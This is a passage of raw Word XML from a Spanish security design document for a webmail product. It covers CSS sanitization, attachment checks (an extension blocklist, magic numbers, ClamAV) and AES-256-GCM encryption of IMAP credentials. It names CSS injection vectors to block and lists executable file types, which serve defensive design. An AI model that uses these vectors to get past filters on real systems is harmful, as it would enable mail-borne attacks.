        <w:t xml:space="preserve">'font-size'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'font-weight'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'font-style'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'text-decoration'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'text-align'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'line-height'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'margin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'padding'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'border'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'width'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'height'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'max-width'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'display'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'vertical-align'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'border-collapse'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'border-spacing'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Bloquear: @import, behavior, -moz-binding, expression(), url() con HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Juice es el estándar de facto para CSS inlining en correos electrónicos, requerido porque la mayoría de clientes de email ignoran o eliminan hojas de estilo externas y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;style&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">blocks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[121]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[117]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:id="135" w:name="Xff602ed64be675de2646cbc06831fd40177190d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1.3 Adjuntos: restricción MIME, magic numbers, ClamAV opcional</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los adjuntos representan un vector de propagación de malware directo. La estrategia de Webmail 6.0 se basa en múltiples capas de validación aplicadas en secuencia estricta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Validación declarativa del nombre de archivo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El backend rechaza archivos con extensiones de riesgo conocido:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.bat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.cmd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.vbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.ps1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.jar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.apk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.scr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.msi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Las extensiones dobles (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.pdf.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) se detectan inspeccionando el último componente separado por punto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Verificación de magic numbers:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La librería</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file-type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lee los primeros bytes del archivo y compara su firma mágica contra el MIME-type declarado. Un archivo que declara</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/pdf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pero cuyos primeros bytes comienzan con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MZ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ejecutable Windows) se rechaza inmediatamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Restricción de tamaño:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Límite absoluto de 25 MB por archivo, configurable por instancia. Este límite alinea con las restricciones de los principales proveedores de email (Gmail impone 25 MB para adjuntos no-BASE64).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Escaneo antivirus opcional (ClamAV):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cuando está habilitado, los adjuntos se escanean vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">clamd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(daemon ClamAV) antes de almacenarse. ClamAV soporta formatos de archivo, archivos comprimidos (ZIP, TAR, GZIP, BZIP2), ejecutables (ELF, PE) y documentos de Office</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[59]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[65]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La cadena de prueba EICAR sirve para validar la integridad del pipeline de escaneo sin utilizar malware real.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="136" w:name="credenciales-imap-aes-256-gcm-en-reposo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1.4 Credenciales IMAP: AES-256-GCM en reposo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Las credenciales IMAP (contraseñas y tokens OAuth2) se almacenan en MongoDB cifradas con AES-256-GCM (Galois/Counter Mode), un algoritmo de cifrado autenticado (AEAD) que proporciona tanto confidencialidad como integridad. El módulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de Node.js implementa AES-256-GCM nativamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[108]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[118]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 utiliza el plugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mongoose-aes-encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que cifra transparentemente campos designados del schema antes de persistirlos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[154]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> createAESPlugin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mongoose-aes-encryption'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createAESPlugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>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IMAP_CREDENTIALS_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 32 bytes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> accountSchema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Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imapHost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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imapPort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Number</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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">993</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imapPassword</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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypted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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">oauth2AccessToken</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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypted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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">oauth2RefreshToken</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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encrypted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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountSchema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">plugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fields</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imapPassword'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'oauth2AccessToken'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'oauth2RefreshToken'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los parámetros criptográficos son críticos: la clave debe tener exactamente 32 bytes (256 bits), generada con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto.randomBytes(32)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y almacenada en una variable de entorno o KMS. El IV (vector de inicialización) debe ser único por operación de cifrado, tener 12 bytes para GCM, y generarse con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto.randomBytes(12)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Reutilizar un IV con la misma clave en GCM compromete completamente la confidencialidad del cifrado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[119]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:id="137" w:name="X00a3a26f6c4f762ebed197a33281b81fd2a6053"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1.5 Sesiones: JWT 15 min + refresh en Redis/HttpOnly cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
